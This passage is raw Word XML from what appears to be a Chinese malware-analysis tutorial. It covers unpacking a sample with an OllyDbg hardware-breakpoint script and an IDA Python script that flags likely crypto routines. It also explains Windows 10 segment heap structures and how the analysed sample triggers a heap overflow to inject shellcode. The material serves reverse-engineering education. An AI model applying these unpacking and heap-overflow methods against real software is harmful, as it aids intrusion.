        <w:t>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sto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//相当于f8</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> //保存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esp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地址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mov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address,esp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>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bphws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address,"r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" //当读取address的时候产生硬件中断</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> run  //相当于f9</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>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sto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>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sto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>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sto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> BPHWC address //清除硬件断点</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>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sti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//相当于f7</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> msg "Welcome To EP"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  <w:t>运行结果如下：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472D853D" wp14:editId="4B4E2DFE">
            <wp:extent cx="5029200" cy="30099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  <w:t>3.脱壳后，查看导入的函数，没发现加密的库函数，使用PEID的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Kyrpto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ANALyzer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插件扫描病毒程序，同样也没发现什么加密算法。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385D4B7A" wp14:editId="236BE790">
            <wp:extent cx="4290060" cy="526542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6E256ABF" wp14:editId="16953433">
            <wp:extent cx="4800600" cy="7650480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65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2C7D2304" wp14:editId="290B13D8">
            <wp:extent cx="5274310" cy="261493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  <w:t>4.由于TXT文件已被篡改，那么病毒很有可能使用了加密算法，那么接下来使用IDA脚本找到该病毒程序的算法函数，IDA脚本如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># -*- coding:utf-8 -*-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def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mul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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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def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imul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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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def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opand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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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def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opor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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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def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opnot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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>def div():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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def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xor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():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>def default():</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>switch = {    '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mul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':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mul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      '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imul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':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imul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             'and':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opand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             'or':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opor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             'not':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opnot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      'div': div,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      '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xor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':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xor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                 }</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/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FunAddress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= []</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/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OpAndTypeNum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=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dict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()</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/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FindFunc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=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dict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()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def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GetKeyFunc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(Start, End):</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    #把代码段中的所有函数存放在列表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FunAddress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中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   for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function_ea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in Functions(Start, End):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FunAddress.append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(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function_ea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)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FunAddress.append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(End)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>    #遍历所有的函数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 xml:space="preserve">    for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in range(0,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len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(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FunAddress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)):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#获取函数名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FunctionName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=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GetFunctionName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(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FunAddress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[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])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#判断是否为用户函数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       if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+ 1 !=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len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(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FunAddress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) and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FunctionName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[0]=='s' and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FunctionName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[1]=='u' and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FunctionName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[2]=='b':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OpNum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=0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    #清空字典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OpAndTypeNum.clear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()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    #遍历所有函数中的指令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           for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singfuc_ea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in range(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FunAddress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[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],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FunAddress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[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+ 1]):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               flag =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GetFlags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(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singfuc_ea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)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        #判断是否为操作码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               if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isCode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(flag):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            #获取汇编指令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                   op =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GetMnem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(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singfuc_ea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)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            #使用switch判断是否为算术或逻辑指令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  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OpAndTypeNum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[op] =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OpAndTypeNum.get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(op,0)+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switch.get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(op, default)()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    #统计算术或逻辑指令的个数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           for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OP,value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in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OpAndTypeNum.items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():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        if value&gt;0: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  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OpNum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+=1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             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    #如果算术或逻辑指令的个数大于2，则可以初步判断该函数为用户写的算法函数(有误差)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           if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OpNum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&gt;2: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FindFunc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[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FunctionName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]=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FunAddress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[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]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>                #print "i:",FunAddress[i],"i+1:",FunAddress[i+1]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         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   for Name,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in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FindFunc.items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():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       print Name, ":",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>for seg in Segments():  # 遍历所有的段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   if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SegName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(seg) == '.text':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GetKeyFunc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(seg,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SegEnd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(seg))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  <w:t>运行结果：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57B50D38" wp14:editId="14DDB50D">
            <wp:extent cx="2979420" cy="221742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  <w:t>Windows 10堆溢出和堆的内核结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.我简单介绍一下Windows10系统中的堆：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆可以</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分为NT堆和段堆，NT堆又可以分为后端分配堆和低碎片化堆，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>段堆主要</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分为:可变大小分配堆和低碎片化堆，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>段堆一般</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是系统进程使用。通常在默认情况下，用户开发的程序往往使用的是NT堆，而要用户开发的程序也使用段堆，那么就要按如下方法在注册表中进行设置:</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\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CurrentControlSet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\Control\Session Manager\Segment Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Enabled = (DWORD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>0 : Disable Segment Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>(Not 0): Enable Segment Heap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</w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>段堆的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内核结构如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>_SEGMENT_HEAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//堆的内存大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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+0x000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TotalReservedPages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Uint8B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+0x008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TotalCommittedPages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Uint8B</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//堆的标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x010 Signature : Uint4B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+0x014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GlobalFlags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Uint4B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+0x018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FreeCommittedPages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Uint8B</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x020 Interceptor : Uint4B</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//堆在堆数组中的下标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+0x024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ProcessHeapListIndex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Uint2B</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//堆内存锁住状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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+0x026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GlobalLockCount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Uint2B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+0x028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GlobalLockOwner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Uint4B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+0x030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LargeMetadataLock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_RTL_SRWLOCK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+0x038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LargeAllocMetadata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_RTL_RB_TREE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+0x048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LargeReservedPages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Uint8B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+0x050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LargeCommittedPages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Uint8B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+0x058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SegmentAllocatorLock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_RTL_SRWLOCK</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//子段链表</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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+0x060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SegmentListHead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_LIST_ENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>//子</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>段数量</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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+0x070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SegmentCount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Uint8B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>//空闲内存页面</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> 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+0x078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FreePageRanges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_RTL_RB_TREE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+0x088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StackTraceInitVar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_RTL_RUN_ONCE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+0x090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ContextExtendLock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_RTL_SRWLOCK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+0x098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AllocatedBase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Ptr64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UChar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 +0x0a0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UncommittedBase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Ptr64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UChar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 +0x0a8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ReservedLimit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Ptr64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UChar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 +0x0b0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VsContext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_HEAP_VS_CONTEXT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+0x120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LfhContext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_HEAP_LFH_CONTEXT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</w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在段堆的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结构中我们可以看到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VsContent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和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LFHContent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，它们分别对应上面写的可变大小分配堆和低碎片化堆，这两个堆</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是段堆常用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的堆。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  <w:t>2.在导入窗口看到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CreateWindowExA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函数，那么就有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WinMain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函数，进入OD，看到窗口处理函数40210D，进入40210D会看到触发堆溢出函数。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57C90318" wp14:editId="2FFB4375">
            <wp:extent cx="5242560" cy="716280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5588A32F" wp14:editId="71B128F5">
            <wp:extent cx="5274310" cy="568325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75E91863" wp14:editId="03B29459">
            <wp:extent cx="5274310" cy="63182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  <w:t>3.有时用OD打开程序直接进入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ntdll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模块，那么程序显然无法正常运行，接下来搜索地址401000，接着选中40100，右键点击此处新建EIP(修改EIP)，那么就可以正常运行了。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0A5997C3" wp14:editId="1F2E8DC6">
            <wp:extent cx="5274310" cy="116776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2A1FC8D1" wp14:editId="05BC6CFF">
            <wp:extent cx="5274310" cy="1732280"/>
            <wp:effectExtent l="0" t="0" r="254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  <w:t>4.病毒先是分配10个堆，然后释放其中一个块，然后在空闲块中分配shellcode，shellcode覆盖了下一块的头部及部分堆块，shellcode可在窗口中看到。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2067BD83" wp14:editId="3AAA22E6">
            <wp:extent cx="5274310" cy="139382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46DE1E49" wp14:editId="2BC6BE02">
            <wp:extent cx="5274310" cy="13233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523CAC3D" wp14:editId="11F688BA">
            <wp:extent cx="5274310" cy="58356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7CA87234" wp14:editId="4338B6E3">
            <wp:extent cx="5274310" cy="14414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  <w:t>5.接下来看看堆溢出过程，在内存窗口可以看到已分配的块和释放的块，当释放一个块之后，病毒成功注入shellcode。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6532311F" wp14:editId="0D080140">
            <wp:extent cx="5274310" cy="11861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51935265" wp14:editId="5A198D76">
            <wp:extent cx="5274310" cy="48742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7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1BCCC842" wp14:editId="1007A3E7">
            <wp:extent cx="5274310" cy="487426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7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  <w:t>6.堆溢出往往发生在堆块中，思路一般是先分配几个块，然后释放一个块，在上一个块进行赋值操作时，赋值大于块的容量进而覆盖下一个块的头部及部分块身，进而发生重定向攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆块分为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>两种:空闲块和已分配块，它们分别对应不同的块头，它们的块头如下所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>空闲块的头部大小是32个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>_HEAP_VS_CHUNK_FREE_HEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> +0x000 Header : _HEAP_VS_CHUNK_HEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
